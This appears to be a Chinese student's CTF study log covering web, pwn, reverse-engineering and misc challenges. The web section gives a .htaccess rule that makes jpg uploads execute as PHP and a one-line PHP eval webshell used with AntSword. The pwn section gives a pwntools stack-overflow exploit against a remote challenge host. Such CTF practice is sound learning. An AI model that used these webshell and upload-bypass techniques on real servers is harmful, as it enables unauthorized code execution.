2.19学习记录
Web
easyupload3.0
这是一道构造.htaccess文件的传马
如下:
<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>
.htaccess文件可以作为一个解释器,可以将传进去的图片马改为php马上传之后再传个图片马,之后就可以蚁剑了
[极客大挑战 2019]Knife
根据提示构造木马
/?<?php eval($_POST["Syc"]);?>
之后用蚁剑连接即可flag在根目录下
pwn
[BUUCTF]bjdctf_2020_babystack
先用exe看一下64位的exe文件,用ida查看主调函数
分析代码发现在read处存在栈溢出
exp:
from pwn import *
io=remote('node2.anna.nssctf.cn',28733)
io.sendlineafter("name:",b'100')
payload=b'a'*(0x10+8)+p64(0x4006E6)
io.sendlineafter("name?",payload)
io.interactive()
re
[SWPUCTF 2021 新生赛]非常简单的逻辑题
题目
flag = 'xxxxxxxxxxxxxxxxxxxxx'
s = 'wesyvbniazxchjko1973652048@$+-&*<>'
result = ''
for i in range(len(flag)):
s1 = ord(flag[i])//17
s2 = ord(flag[i])%17
result += s[(s1+i)%34]+s[-(s2+i+1)%34]
print(result)
# result = 'v0b9n1nkajz@j0c4jjo3oi1h1i937b395i5y5e0e$i'
题目的意思是在for循环中,对flag的ASCII值取整并赋给s1,对flag的ASCII值取余并赋给s2,在进行一个加密算法赋给result。
根据查询ai,分析思路:先在一定范围的ASCII值中,取整取余,分别赋给s1,s2
再定义一个函数命名为res,让其等于加密算法,此时的加密算法i已经不能再用i表示,替换成num
再写一个if判断,res与result的两两分组的值是否相等
exp:
flag = ''
s = 'wesyvbniazxchjko1973652048@$+-&*<>'
result = 'v0b9n1nkajz@j0c4jjo3oi1h1i937b395i5y5e0e$i'
res = ''
num = 0
for j in range(0,len(result),2):
for i in range(255):
s1 = i//17
s2 = i%17
res = s[(s1+num)%34]+s[-(s2+num+1)%34]
if res == result[j:j+2]:
flag += chr(i)
num += 1
print(flag)
misc
[NISACTF 2022]huaji?
用010查看附件发现是个jfif文件用随波逐流一把梭了
发现含有一个zip,内容是叫作flag的文档
用binwalk分出来,压缩包是加密的
得到的jpg查看一下exif,发现可疑信息标记处猜一波是密码,结果还真是